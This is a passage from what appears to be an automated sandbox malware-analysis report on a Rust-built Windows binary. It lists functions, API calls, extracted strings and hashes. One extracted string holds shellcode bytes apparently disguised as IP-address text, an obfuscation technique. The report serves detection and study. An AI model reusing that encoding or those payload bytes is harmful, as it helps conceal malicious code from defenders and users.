                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF73A5ADE05), ref: 00007FF73A5B86E9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID:
                                          • API String ID: 2962429428-0
                                          • Opcode ID: 54aa6f87487bae02c1bcd4deae3fcd98bce8bc8ffe17e65ba92b29f21d3508a3
                                          • Instruction ID: 2687c80fea6e855cfde8fd19a73bb3ef87643f0af801d6604f0dc2ec480833b4
                                          • Opcode Fuzzy Hash: 54aa6f87487bae02c1bcd4deae3fcd98bce8bc8ffe17e65ba92b29f21d3508a3
                                          • Instruction Fuzzy Hash: BDF0F627F1871992FA11AB55A84237D9250BB06B9AF8400B2DE0C02794CF3CE1C2E220
                                          Function 00007FF73A5B8644 Relevance: 1.3, APIs: 1, Instructions: 34COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: CloseHandle$FileObjectSingleWaitWrite
                                          • String ID:
                                          • API String ID: 1197516534-0
                                          • Opcode ID: ac7523652c1a9ed54011a6fe966dd85e651e47d7a99329cb94beb36c4bbd6dde
                                          • Instruction ID: 1c4b429af4e87ef68812511c50b75480350750dc49cd6e85feb6f746227394c4
                                          • Opcode Fuzzy Hash: ac7523652c1a9ed54011a6fe966dd85e651e47d7a99329cb94beb36c4bbd6dde
                                          • Instruction Fuzzy Hash: 57F09077F1871496F711EB65E85236EA264BB45B99F80147ADE0D13794CF3CE0C2D220
                                          Function 00007FF73A5C8C9F Relevance: 1.3, APIs: 1, Instructions: 27COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: CloseCryptCurrentHandleProcessRandom
                                          • String ID:
                                          • API String ID: 837579515-0
                                          • Opcode ID: f1d5dfea6900067569ec1c231c8e48ae001120cc24dc752beeb047049223b3ef
                                          • Instruction ID: f639273f8c8dcaa8e72c4fafb06c46d7747ad9fe20de3218e7e2afca79db36a9
                                          • Opcode Fuzzy Hash: f1d5dfea6900067569ec1c231c8e48ae001120cc24dc752beeb047049223b3ef
                                          • Instruction Fuzzy Hash: AFF0BE3A648501A2F715AF29D4413ACA291EB02BA4F880070DF9C47AD8CF7CE8E5E320

                                          Non-executed Functions

                                          Function 00007FF73A5A1880 Relevance: 90.0, APIs: 36, Strings: 15, Instructions: 789libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: ErrorLast$AddressCaptureContextCurrentDirectoryEntryFunctionLibraryLoadLookupObjectProcSingleWaitmemset
                                          • String ID: EnumerateLoadedModulesW64$SymAddrIncludeInlineTrace$SymFromInlineContextW$SymGetLineFromInlineContextW$SymGetOptions$SymGetSearchPathW$SymInitializeW$SymQueryInlineTrace$SymSetOptions$SymSetSearchPathW$assertion failed: len >= 0$dbghelp.dll$internal error: entered unreachable code/rustc/90b35a6239c3d8bdabc530a6a0816f7ff89a0aaf\library\alloc\src\vec\mod.rs$note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtraces [... omitted frame ...]$stack backtrace:
                                          • API String ID: 2237928666-3866678080
                                          • Opcode ID: 2e0697ca662406930e799439386a56be8149fb00d7aadfcf2c859596d334c49c
                                          • Instruction ID: 1969e797b40ca23083930a93a91af21d8a6062896a8958250a9f7589519fd966
                                          • Opcode Fuzzy Hash: 2e0697ca662406930e799439386a56be8149fb00d7aadfcf2c859596d334c49c
                                          • Instruction Fuzzy Hash: E892B53AA09AC2A9FB329F24DC423E973A0FF55788F840175DA4D4BBA4DF399255D310
                                          Function 00007FF73A5CC080 Relevance: 39.1, APIs: 11, Strings: 11, Instructions: 629libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: AddressProc$CurrentProcessmemset
                                          • String ID: ($($SymAddrIncludeInlineTrace$SymFromAddrW$SymFromInlineContextW$SymGetLineFromAddrW64$SymGetLineFromInlineContextW$SymQueryInlineTrace$X$X$called `Option::unwrap()` on a `None` value/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\io\borrowed_buf.rs/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\alloc\src\collections\btree\navigate.rs
                                          • API String ID: 3017635649-3223535655
                                          • Opcode ID: 8992c0ac207b2bf095a1048dad7957f7d4498f68d30f6f66bb6674a7cb82d803
                                          • Instruction ID: deb12aadcf2f79acf85ef42c02ae9e9ca7e7614a55fc8c504b0eaad28c9fd18c
                                          • Opcode Fuzzy Hash: 8992c0ac207b2bf095a1048dad7957f7d4498f68d30f6f66bb6674a7cb82d803
                                          • Instruction Fuzzy Hash: 7942D136A08A82A1F7359B14E44A7FAB360FF86B94F804175EA8D03798DF3DD145E760
                                          Function 00007FF73A5CBCB0 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 222libraryloadersynchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WaitForSingleObjectEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF73A5CBCF8
                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF73A5CBD11
                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF73A5CBD4A
                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF73A5CBD82
                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF73A5CBDBB
                                          • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF73A5CBDD4
                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF73A5CBE12
                                          • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF73A5CBE6C
                                          • CreateMutexA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF73A5CBEFE
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF73A5CBF23
                                          • ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF73A5CBF69
                                          • ReleaseMutex.KERNEL32(?,?,?,?,?), ref: 00007FF73A5CC01E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: AddressProc$Mutex$CurrentProcessRelease$CloseCreateHandleLibraryLoadObjectSingleWait
                                          • String ID: SymAddrIncludeInlineTrace$SymGetOptions$SymInitializeW$SymSetOptions$called `Option::unwrap()` on a `None` value/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\io\borrowed_buf.rs/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\alloc\src\collections\btree\navigate.rs$dbghelp.dll
                                          • API String ID: 2119853198-2283261341
                                          • Opcode ID: 4b2c1fc9ce42c7ae5ebe4485f88a3dde7baefa0ee0026cf6fe2f04af51483210
                                          • Instruction ID: ebad091e463ee414678372d143bcad9f21cfa9f1b3f92a01a6f92014343b3df6
                                          • Opcode Fuzzy Hash: 4b2c1fc9ce42c7ae5ebe4485f88a3dde7baefa0ee0026cf6fe2f04af51483210
                                          • Instruction Fuzzy Hash: DBA1D02AA09A42A5FB10AF24AC427B4B3A0FF46B54F844174DDAD423E4DF3CE555E330
                                          Function 00007FF73A5A390F Relevance: 21.8, APIs: 7, Strings: 5, Instructions: 755COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: AddressErrorLastWait
                                          • String ID: Box<dyn Any>aborting due to panic at $RUST_BACKTRACEfailed to write the buffered data$full$internal error: entered unreachable code/rustc/90b35a6239c3d8bdabc530a6a0816f7ff89a0aaf\library\alloc\src\vec\mod.rs$main
                                          • API String ID: 1574541344-3767916208
                                          • Opcode ID: cf9ea439bbed6309da8b0fb5e87ed36c06bd380235b973d50af1b4e1a94eb416
                                          • Instruction ID: 9e31bf829db73adf27dee22a2b2757f589e817ee886448d9bfc642a44f775850
                                          • Opcode Fuzzy Hash: cf9ea439bbed6309da8b0fb5e87ed36c06bd380235b973d50af1b4e1a94eb416
                                          • Instruction Fuzzy Hash: 4672F47AB09B82A5FB61AF14D8423E8B3A0FB16B98F804175DE5D4B790DF38E584D310
                                          Function 00007FF73A5A6440 Relevance: 20.1, APIs: 3, Strings: 10, Instructions: 594COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: memmove
                                          • String ID: 252.72.131.228240.232.200.00.0.65.8165.80.82.8186.72.49.210101.72.139.8296.72.139.8224.72.139.8232.72.139.11480.72.15.18374.74.77.49201.72.49.192172.60.97.1242.44.32.65193.201.13.651.193.226.23782.65.81.72139.82.32.13966.60.72.1208.102.129.1$401$403$Invalid UTF-8 sequence$attempt to calculate the remainder with a divisor of zero$called `Result::unwrap()` on an `Err` value$cryp$cryp$cryp$cryp
                                          • API String ID: 2162964266-1709460868
                                          • Opcode ID: 2178f9af50b5d916e908578593d1f9af5006237e6be56684ae9408c1c753f351
                                          • Instruction ID: ccb961f38e88bd9a072f1171442aeec65ae6d18cabb62eb7e0159587fd941b2c
                                          • Opcode Fuzzy Hash: 2178f9af50b5d916e908578593d1f9af5006237e6be56684ae9408c1c753f351
                                          • Instruction Fuzzy Hash: 1052D37AA09BC2A8FB61AF24D8423E9B760FB45788F804171DA4D47B99DF3CD245D350
                                          Function 00007FF73A5C2190 Relevance: 16.2, APIs: 7, Strings: 2, Instructions: 455COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: ErrorLast$FullNamePath
                                          • String ID: /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs$\\?\\\?\UNC\
                                          • API String ID: 2482867836-482199288
                                          • Opcode ID: 9128aa4e018cae0e7891eef502d1ee9996ca88ad3b819a35fd94c1d1deafdf2b
                                          • Instruction ID: df130c2f7df5d8130ba1cb49f80dcd6cc2a1bba9c030d2eb31fd78dd51ae5f51
                                          • Opcode Fuzzy Hash: 9128aa4e018cae0e7891eef502d1ee9996ca88ad3b819a35fd94c1d1deafdf2b
                                          • Instruction Fuzzy Hash: 6012E76AA04782A5FB78BF15D4453FDA394FB06B88F808075DE9D47698DF38D681A330
                                          Function 00007FF73A59CEC0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 244filenativesynchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: ErrorHandle$CloseConsoleFileLastModeObjectSingleStatusWaitWrite
                                          • String ID: called `Result::unwrap()` on an `Err` value
                                          • API String ID: 3090192319-2333694755
                                          • Opcode ID: 72f7b5533a2cb62cff9e5685893e1fbc87e345525c20116d02f980b5f783a4a2
                                          • Instruction ID: 391d756a5ed7e96350a0b44b17235536268f8a8506b074f6386772dda837d452
                                          • Opcode Fuzzy Hash: 72f7b5533a2cb62cff9e5685893e1fbc87e345525c20116d02f980b5f783a4a2
                                          • Instruction Fuzzy Hash: 58B1D667A08682A9FB10AF20D8457FCB761FB56398F844279EE5E066D4DF3CD185E320
                                          Function 00007FF73A5DA9C0 Relevance: 13.6, APIs: 9, Instructions: 71COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                          • String ID:
                                          • API String ID: 313767242-0
                                          • Opcode ID: 34d6542f7f794a0f6f7474246d8b34ea543ec262e28fd8cfcb632f9fcd746296
                                          • Instruction ID: f322259884db70c2fc817e68a4705468778b4a633a54a3400af27c1f5f1b2900
                                          • Opcode Fuzzy Hash: 34d6542f7f794a0f6f7474246d8b34ea543ec262e28fd8cfcb632f9fcd746296
                                          • Instruction Fuzzy Hash: 23317C77609B819AFB64AF64E8813EAB360FB85744F84407ADB5D47B94DF38C248C720
                                          Function 00007FF73A5A08B9 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 362windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • NTDLL.DLL, xrefs: 00007FF73A5A08F7
                                          • assertion failed: self.is_char_boundary(new_len)/rustc/90b35a6239c3d8bdabc530a6a0816f7ff89a0aaf\library\alloc\src\string.rs, xrefs: 00007FF73A5A0F46
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: FormatHandleMessageModulememmovememset
                                          • String ID: NTDLL.DLL$assertion failed: self.is_char_boundary(new_len)/rustc/90b35a6239c3d8bdabc530a6a0816f7ff89a0aaf\library\alloc\src\string.rs
                                          • API String ID: 2025335819-1565840215
                                          • Opcode ID: e07b8a30c25dd0a34cfd926d1bdc520ee7c9484e5b1087614093a708e7ed17c1
                                          • Instruction ID: 7f4dbe66d23b5be01743d190f5e64d075d08c42108d65db354e017b4df976be7
                                          • Opcode Fuzzy Hash: e07b8a30c25dd0a34cfd926d1bdc520ee7c9484e5b1087614093a708e7ed17c1
                                          • Instruction Fuzzy Hash: CBF1B33BA196C2A9F7369F20D8117FDB760F706388F804176DA5D0AAC9DF789285E350
                                          Function 00007FF73A5C9530 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 272threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InitializeProcThreadAttributeList.KERNEL32(?,?,?,?,?,?,?,?,00000006,?,00000000,00000000,00000000,?,00000002,?), ref: 00007FF73A5C957D
                                          • InitializeProcThreadAttributeList.KERNEL32(?,?,?,?,?,?,?,?,00000006,?,00000000,00000000,00000000,?,00000002,?), ref: 00007FF73A5C965A
                                          • UpdateProcThreadAttribute.KERNEL32(?,?,?,?,?,?,?,?,00000006,?,00000000,00000000,00000000,?,00000002,?), ref: 00007FF73A5C96BA
                                          Strings
                                          • called `Option::unwrap()` on a `None` value/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\io\borrowed_buf.rs/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\alloc\src\collections\btree\navigate.rs, xrefs: 00007FF73A5C98EE, 00007FF73A5C9908
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: AttributeProcThread$InitializeList$Update
                                          • String ID: called `Option::unwrap()` on a `None` value/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\io\borrowed_buf.rs/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\alloc\src\collections\btree\navigate.rs
                                          • API String ID: 3806694049-556906072
                                          • Opcode ID: 0dfe3c82ccac4f305239c7274cd924dba27e9465a78d90e8cd86c24138786262
                                          • Instruction ID: b6b7c59d16f85d560c2cb36900b3e86196993361a927e46dfbd224428a9068c1
                                          • Opcode Fuzzy Hash: 0dfe3c82ccac4f305239c7274cd924dba27e9465a78d90e8cd86c24138786262
                                          • Instruction Fuzzy Hash: 31A1276AB19A51E1FA14AB6594027F9A3A0BF47BA4F844271DDAD077C8DF3CE141E330
                                          Function 00007FF73A5C0FB0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 230windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • NTDLL.DLL, xrefs: 00007FF73A5C1008
                                          • assertion failed: self.is_char_boundary(new_len)/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\alloc\src\string.rs, xrefs: 00007FF73A5C1334
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: ErrorFormatHandleLastMessageModulememset
                                          • String ID: NTDLL.DLL$assertion failed: self.is_char_boundary(new_len)/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\alloc\src\string.rs
                                          • API String ID: 1434010500-313772267
                                          • Opcode ID: 4faf0fd0c90817c6fcaca654bddc8f4c1fb2edc4ab12b504d66ec4c636cb8032
                                          • Instruction ID: a1507abdb07fcf712237ca1a4dacff433d966d98a1b8a9529c66d342d25a1750
                                          • Opcode Fuzzy Hash: 4faf0fd0c90817c6fcaca654bddc8f4c1fb2edc4ab12b504d66ec4c636cb8032
                                          • Instruction Fuzzy Hash: 9AA1C73EA09AC2A4F7319F21D8017F8B7A4FB06384F844175DA8D46B98DF7C9685E320
                                          Function 00007FF73A5DA89C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                          • String ID:
                                          • API String ID: 2933794660-0
                                          • Opcode ID: c1499a795a96f987631c70095ea0b3911191cc6322be47dd0d805d40b6ca3f3c
                                          • Instruction ID: 1162f39ac2a49bca3e03f0f5cf0a4ef1818a2716c703d99cdc445f9c84b5b999
                                          • Opcode Fuzzy Hash: c1499a795a96f987631c70095ea0b3911191cc6322be47dd0d805d40b6ca3f3c
                                          • Instruction Fuzzy Hash: BC114C26B55B029AFF009B60E8462A973A4F71A758F840E31EE2D427A4DF38D1A48390
                                          Function 00007FF73A5C0D00 Relevance: 4.6, APIs: 3, Instructions: 85filenativesynchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: ErrorFileObjectReadSingleStatusWait
                                          • String ID:
                                          • API String ID: 3583596364-0
                                          • Opcode ID: 410b11c42a71bbe637eca19ae8600612a85dc4b68e6dc7e78f84d677879cbb33
                                          • Instruction ID: 16245b7317f4d66e50b6a0de8fb85314294d03e8214e0ee3a88ee630fd56756c
                                          • Opcode Fuzzy Hash: 410b11c42a71bbe637eca19ae8600612a85dc4b68e6dc7e78f84d677879cbb33
                                          • Instruction Fuzzy Hash: B0316236A08B8196F7609B24F4513AAF3A5FB85350F908275E6DD42BA8DF7CE0C49B10
                                          Function 00007FF73A5D9490 Relevance: 4.4, Strings: 3, Instructions: 653COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
